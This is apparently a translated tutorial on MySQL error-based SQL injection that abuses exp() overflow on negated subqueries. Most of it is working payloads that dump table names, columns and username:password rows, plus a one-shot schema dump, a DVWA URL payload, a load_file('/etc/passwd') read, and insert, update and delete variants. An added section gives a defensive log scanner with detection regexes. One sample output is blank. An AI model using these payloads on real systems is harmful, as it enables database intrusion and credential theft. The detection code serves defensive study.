0x01 Preface
Good news: the author has also found a DOUBLE-type data overflow in MySQL. If you want to understand how overflow errors can be used to extract data, read the author's previous post, BIGINT Overflow Error based injections; drops also has a corresponding translation, see here. Among MySQL's functions the author was most interested in the mathematical ones, since they must hold their values in some data type. So the author tested which functions would raise overflow errors, and discovered that exp() raises an overflow error when passed a value greater than 709.
mysql> select exp(709);
+-----------------------+
| exp(709)              |
+-----------------------+
| 8.218407461554972e307 |
+-----------------------+
1 row in set (0.00 sec)

mysql> select exp(710);
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(710)'
In MySQL, exp() is the inverse of ln() and log(). Briefly, log() and ln() both return the logarithm to base e, as shown here:
mysql> select log(15);
+------------------+
| log(15)          |
+------------------+
| 2.70805020110221 |
+------------------+
1 row in set (0.00 sec)

mysql> select ln(15);
+------------------+
| ln(15)           |
+------------------+
| 2.70805020110221 |
+------------------+
1 row in set (0.00 sec)
The exponential function exp() is the inverse of the logarithmic function, that is, of the logarithm to base e:
mysql> select exp(2.70805020110221);
+-----------------------+
| exp(2.70805020110221) |
+-----------------------+
|                       |
+-----------------------+
1 row in set (0.00 sec)
0x02 Injection
For the injection we use a negated query to trigger the "DOUBLE value is out of range" error. As mentioned in the author's previous post, bitwise negation of 0 returns 18446744073709551615, and because the function returns 0 after successful execution, we get the maximum unsigned BIGINT value for a successfully executed function.
mysql> select ~0;
+----------------------+
| ~0                   |
+----------------------+
| 18446744073709551615 |
+----------------------+
1 row in set (0.00 sec)

mysql> select ~(select version());
+----------------------+
| ~(select version())  |
+----------------------+
| 18446744073709551610 |
+----------------------+
1 row in set, 1 warning (0.00 sec)
Combining a subquery with bitwise negation produces the DOUBLE overflow error in one step, and the error message carries the data out.
' exp(~(select*from(select user())x))

mysql> select exp(~(select*from(select user())x));
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select '<user@host>' from dual)))'
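From the defender's side, both halves of the exchange above are visible in logs: the request carries the exp(~(select ... probe, and the response carries error 1690 with the leaked subquery value. The following scanner is an added example, not code from the original post; it runs over constructed web-access and application-error log lines (the paths, IPs and dbuser@localhost value are invented) and recovers the leaked value so an incident responder can tell what was exposed.

```python
"""Flag EXP()/BIGINT overflow error-based SQL injection in application logs.
Added example, not code from the original post. Request side: a URL-decoded
query string containing exp(~(select ... or the bare negated subquery
~(select ... of the BIGINT variant. Response side: MySQL error 1690 echoed by
the application, from which the leaked subquery result is recovered."""
import re
from urllib.parse import unquote_plus

EXP_PROBE_RE = re.compile(r"\bexp\s*\(\s*~\s*\(\s*select\b", re.IGNORECASE)
NEG_SUBQ_RE = re.compile(r"~\s*\(\s*select\b", re.IGNORECASE)
ERROR_1690_RE = re.compile(
    r"ERROR 1690 \(22003\): \w+(?: UNSIGNED)? value is out of range in '(?P<expr>.*)'",
    re.IGNORECASE)
# MySQL echoes the scalar subquery as (select '<value>' from dual).
LEAK_RE = re.compile(r"\(select '(?P<value>(?:[^']|'')*)' from dual\)", re.IGNORECASE)

def classify_line(line):
    """Return ('error_leak', leaked_value), ('probe', variant) or None."""
    decoded = unquote_plus(line)  # %27 -> ', %7E -> ~, + -> space
    err = ERROR_1690_RE.search(decoded)
    if err:
        leak = LEAK_RE.search(err.group("expr"))
        return ("error_leak", leak.group("value") if leak else None)
    if EXP_PROBE_RE.search(decoded):
        return ("probe", "exp")
    if NEG_SUBQ_RE.search(decoded):
        return ("probe", "negated-subquery")
    return None

def scan(lines):
    """Return [(line_number, kind, detail), ...] for every suspicious line."""
    hits = []
    for n, line in enumerate(lines, 1):
        verdict = classify_line(line)
        if verdict:
            hits.append((n, *verdict))
    return hits

# Constructed sample log lines (not real traffic); the user@host value is invented.
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200',
    '10.0.0.9 - - "GET /vulnerabilities/sqli/?id=1%27%20or%20exp(~(select*from'
    '(select%20user())x))--%20-&Submit=Submit HTTP/1.1" 500',
    "app[1234]: query failed: ERROR 1690 (22003): DOUBLE value is out of range "
    "in 'exp(~((select 'dbuser@localhost' from dual)))'",
    '10.0.0.9 - - "GET /vulnerabilities/sqli/?id=1%20or%20%7E(select*from'
    '(select%20version())x) HTTP/1.1" 500',
]
```

scan(SAMPLE_LOG) flags lines 2 to 4 and reports dbuser@localhost as the value leaked by the error on line 3; only the application echoing the raw MySQL error makes that leak possible, which is what to suppress.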
0x03 Extracting data
Get the table name:
select exp(~(select*from(select table_name from information_schema.tables where table_schema=database() limit 0,1)x));
Get the column name:
select exp(~(select*from(select column_name from information_schema.columns where table_name='users' limit 0,1)x));
Retrieve the data:
select exp(~(select*from(select concat_ws(':',id,username,password) from users limit 0,1)x));
0x04 DIOS (dump in one shot)
This query dumps all tables and columns of the current database in one go. We could also dump all databases, but since we extract through an error message, only a small part of the result comes back.
exp(~(select*from(select concat(@:=0,(select count(*) from `information_schema`.columns where table_schema=database() and @:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@))x))

http://localhost/dvwa/vulnerabilities/sqli/?id=1' or exp(~(select*from(select concat(@:=0,(select count(*) from `information_schema`.columns where table_schema=database() and @:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@))x))-- -&Submit=Submit#
0x04 Read File
You can read files through the load_file() function, but the author found that it is limited to 13 lines; the same statement can also be used in BIGINT overflow injections.
select exp(~(select*from(select load_file('/etc/passwd'))x));
Note that you cannot write files this way: because the statement fails with the error, only a 0 is written to the output file.
mysql> select exp(~(select*from(select 'hello')a)) into outfile 'c:/out.txt';
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'hello' from dual)))'

# type C:\out.txt
0
0x05 Injection in Insert
The same approach, step by step.
mysql> insert into users (id, username, password) values (2, '' ^ exp(~(select*from(select user())x)), 'Eyre');
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select '<user@host>' from dual)))'
The same technique works in insert, update and delete statements and for DIOS queries.
mysql> insert into users (id, username, password) values (2, '' | exp(~(select*from(select concat(@:=0,(select count(*) from `information_schema`.columns where table_schema=database() and @:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@))x)), 'Eyre');
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select '000
newdb::users::id
newdb::users::username
newdb::users::password' from dual)))'
0x06 Injection in Update
mysql> update users set password='Peter' ^ exp(~(select*from(select user())x)) where id=4;
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select '<user@host>' from dual)))'
0x07 Injection in Delete
mysql> delete from users where id='1' | exp(~(select*from(select user())x));
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select '<user@host>' from dual)))'
0x08 Summary
As with the earlier BIGINT injection, EXP injection works on MySQL 5.5.5 and above. Earlier versions are "silent" about this condition and return infinity instead of an error:
mysql> select version();
+---------------------+
| version()           |
+---------------------+
| 5.0.45-community-nt |
+---------------------+
1 row in set (0.00 sec)

mysql> select exp(710);
+----------+
| exp(710) |
+----------+
| 1.#INF   |
+----------+
1 row in set (0.00 sec)

mysql> select exp(~0);
+---------+
| exp(~0) |
+---------+
| 1.#INF  |
+---------+
1 row in set (0.00 sec)
Using EXP for SQL error injection